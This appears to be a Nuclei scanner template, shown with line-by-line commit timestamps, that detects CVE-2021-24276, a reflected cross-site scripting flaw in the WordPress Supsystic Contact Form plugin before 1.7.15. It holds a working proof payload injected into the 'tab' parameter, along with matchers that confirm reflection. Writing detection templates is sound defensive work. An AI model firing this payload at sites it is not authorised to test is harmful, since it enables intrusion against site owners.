2021-09-28 17:07:40 +00:00
id : CVE-2021-24276
info :
2022-09-16 19:50:10 +00:00
name : WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting
2021-09-28 17:07:40 +00:00
author : dhiyaneshDK
2022-09-16 20:03:07 +00:00
severity : medium
2022-09-16 19:50:10 +00:00
description : WordPress Supsystic Contact Form plugin before 1.7.15 contains a cross-site scripting vulnerability. It does not sanitize the tab parameter of its options page before outputting it in an attribute.
2023-09-06 12:09:01 +00:00
remediation : |
Update to the latest version of the WordPress Supsystic Contact Form plugin (1.7.15 or higher) to mitigate this vulnerability.
2021-09-28 17:07:40 +00:00
reference :
- https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html
2022-09-16 19:50:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24276
2021-09-28 17:08:48 +00:00
classification :
2022-09-16 20:03:07 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-16 19:50:10 +00:00
cve-id : CVE-2021-24276
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00177
2023-08-31 11:46:18 +00:00
epss-percentile : 0.54153
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : supsystic
product : contact_form
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : wordpress,cve,cve2021,wp-plugin,wpscan,packetstorm
2021-09-28 17:07:40 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-28 17:07:40 +00:00
- method : GET
path :
2021-09-28 18:54:48 +00:00
- '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-09-28 17:07:40 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-09-28 17:07:40 +00:00
words :
2021-09-28 18:54:48 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-28 17:07:40 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-09-28 17:07:40 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200